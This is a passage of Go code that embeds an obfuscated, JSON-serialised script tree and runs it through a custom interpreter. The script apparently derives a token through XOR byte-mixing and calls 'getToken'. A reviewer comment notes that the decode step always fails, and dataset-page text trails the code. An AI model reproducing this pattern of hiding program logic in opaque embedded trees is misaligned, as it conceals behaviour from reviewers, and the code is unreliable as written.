ft":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"hsioad","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Left":{"Object":{"Name":"alldata","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"Operator":"*","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"var"},{"Left":{"Object":{"Name":"dshu","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Name":"hsioad","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Object":{"Name":"dshu","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":2,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003e\u003e","PAIX":0,"TypeInfo":"yyy"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},{"Left":{"Object":{"Name":"dshu","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Left":{"Object":{"Name":"dshu","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Left":{"Name":"ivvv","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"oooo"},"Right":{"Value":255,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Token":"var","Declaratio
ns":[{"Name":"alldt","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Properties":[{"Key":{"Value":"data","PAIX":0,"TypeInfo":"ooooo"},"Value":{"Name":"dshu","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"llll"}],"PAIX":0,"TypeInfo":"pppppp"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"vhui","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"JSON","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"stringify","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Name":"alldt","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"cbb_a","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"alldt","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"l","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"iiiiiiii"},{"Token":"var","Declarations":[{"Name":"kfc","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Callee":{"Name":"Promise","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"djki","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"new"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"hiho","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"kfc","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"then","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Id":null,"Params":[{"Name":"alldt2","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"l2","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"dshu2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Elements":[],"PAIX":0,"TypeInfo":"ppppp"},"PAIX":0,"TypeInfo":"var"},{"Init":{"Token":"var","Declarations":[{"Name":"ivvv2","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"ivvv2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Caller":{"Name":"len","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"l2","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo
":"iiii"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"ivvv2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"ivvv2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"hsioad","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Name":"cychar","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Object":{"Name":"l2","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Name":"ivvv2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"hdakdasj","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Left":{"Name":"ivvv2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"%","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"gys","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Object":{"Object":{"Name":"alldt2","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"data","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Property":{"Name":"hdakdasj","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"oooo"},"PAIX":0,"TypeInfo":"var"},{"Token":"var","Declarations":[{"Name":"fsg","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Left":{"Name":"hsioad","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Name":"gys","PAIX":-1,"TypeInfo":"aaaaa"},"Operator":"^","PAIX":0,"TypeInfo":"yyy"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"cyappend","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"dshu2","PAIX":-1,"TypeInfo":"aaaaa"},{"Name":"fsg","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},{"Test":{"Left":{"Name":"ivvv2","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":32,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Consequent":{"Body":[{"Caller":{"Name":"cyappend","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"dshu2","PA
IX":-1,"TypeInfo":"aaaaa"},{"Name":"gys","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"Alternate":null,"PAIX":0,"TypeInfo":"iiiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"},{"Token":"var","Declarations":[{"Name":"dt","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Properties":[{"Key":{"Value":"data","PAIX":0,"TypeInfo":"ooooo"},"Value":{"Name":"dshu2","PAIX":-1,"TypeInfo":"aaaaa"},"PAIX":0,"TypeInfo":"llll"}],"PAIX":0,"TypeInfo":"pppppp"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"cbb_a","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"dt","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"ooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Object":{"Name":"hiho","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"then","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Id":null,"Params":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"Body":{"Body":[{"Token":"var","Declarations":[{"Name":"vhui","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Caller":{"Object":{"Name":"JSON","PAIX":-1,"TypeInfo":"aaaaa"},"Property":{"Value":"stringify","PAIX":0,"TypeInfo":"ooooo"},"PAIX":0,"TypeInfo":"oooo"},"Arguments":[{"Name":"a","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"},{"Caller":{"Name":"getToken","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"vhui","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"ooo"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"iiiiiiii"},{"Init":{"Token":"var","Declarations":[{"Name":"irr","PAIX":0,"TypeInfo":"aaaaa"}],"Init":{"Value":0,"PAIX":0,"TypeInfo":"ttt"},"PAIX":0,"TypeInfo":"var"},"Test":{"Left":{"Name":"irr","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":255,"PAIX":0,"TypeInfo":"ttt"},"Operator":"\u003c","PAIX":0,"TypeInfo":"yyy"},"Updata":{"Left":{"Name":"
irr","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Left":{"Name":"irr","PAIX":-1,"TypeInfo":"aaaaa"},"Right":{"Value":1,"PAIX":0,"TypeInfo":"ttt"},"Operator":"+","PAIX":0,"TypeInfo":"yyy"},"Operator":"=","PAIX":0,"TypeInfo":"uuu"},"Body":{"Body":[{"Caller":{"Name":"gid","PAIX":-1,"TypeInfo":"aaaaa"},"Arguments":[{"Name":"irr","PAIX":-1,"TypeInfo":"aaaaa"}],"PAIX":0,"TypeInfo":"iiii"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"pppp"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"ooo"}],"PAIX":0,"TypeInfo":"iiii"},"PAIX":0,"TypeInfo":"var"}],"PAIX":0,"TypeInfo":"iiiiii"},"PAIX":0,"TypeInfo":"iiiiiiii"}],"TypeInfo":"aaaa"}`
// NOTE(review): encodedText above appears to be raw JSON, not base64 —
// characters like '{' and '"' are outside the base64 alphabet, so
// DecodeString below should always return an error, print "Decode error:"
// and return nil without evaluating anything. Confirm whether the blob was
// meant to be base64-encoded or whether the decode step should be removed.
decodedBytes, err := base64.StdEncoding.DecodeString(encodedText)
if err != nil {
fmt.Println("Decode error:", err)
return nil
}
dd := string(decodedBytes)
// Run the parsed program on a goroutine with the promise runtime active;
// the WaitGroup makes the call effectively synchronous.
sdsgh := sync.WaitGroup{}
sdsgh.Add(1)
go func() {
defer sdsgh.Done()
promise.CyJSInit()
ss := parseToDt.LoadStr(dd)
// Panics if LoadStr returns anything other than *ast.Program.
dyy := ss.(*ast.Program)
env := object.NewEnv(nil)
StartEval(dyy.Body, env)
promise.Done()
}()
sdsgh.Wait()
return nil
}
|
Subsets and Splits
PyTorch Neural Network Imports
This query filters for code examples containing a specific PyTorch import pattern. It is useful for finding code snippets that use PyTorch's neural network module, but it does not provide deeper analytical insight into the dataset.
HTML Files in Train Set
Retrieves all records from the dataset where the file path ends with .html or .htm, providing a basic filter for HTML files.
SQL Console for nick007x/github-code-2025
Retrieves 200 file paths that end with '.html' or '.htm', providing a basic overview of HTML files in the dataset.
Top HTML Files
The query retrieves a sample of HTML file paths; it offers basic filtering but limited analytical value.
CSharp Repositories Excluding Unity
Retrieves all records for repositories that contain C# files but are not related to Unity, providing a basic filter over the dataset.
C# File Count per Repository
Counts the total number of C# files across distinct repositories, providing a basic measure of C# file presence.
SQL Console for nick007x/github-code-2025
Lists unique repository IDs containing C# files, providing basic filtering to understand which repositories have C# code.
Select Groovy Files: Train Set
Retrieves the first 1000 entries from the 'train' dataset where the file path ends with '.groovy', providing a basic sample of Groovy files.
GitHub Repos with WiFiClientSecure
Finds specific file paths in repositories that contain particular code snippets related to WiFiClientSecure and ChatGPT, providing basic filtering of relevant files.